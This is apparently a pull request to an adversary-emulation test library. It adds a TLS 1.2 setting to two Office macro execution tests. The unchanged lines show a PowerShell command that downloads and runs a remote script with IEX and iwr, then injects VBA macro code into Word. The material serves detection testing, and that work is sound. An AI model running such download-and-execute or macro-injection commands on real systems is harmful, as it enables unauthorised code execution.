### PR TITLE
Update T1059.005.yaml

### DIFF
--- a/atomics/T1059.005/T1059.005.yaml
+++ b/atomics/T1059.005/T1059.005.yaml
@@ -54,6 +54,7 @@ atomic_tests:
       Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
     cleanup_command: |
@@ -88,6 +89,7 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
     cleanup_command: |


### PR DESCRIPTION
added lines to enable TLS v 1.2

**Details:**
need to add lines to powershell commands using iex/iwr to specify accepted pls versions to keep the commands from erroring out

**Testing:**
tested on windows 10 and 2016

**Associated Issues:**
n/a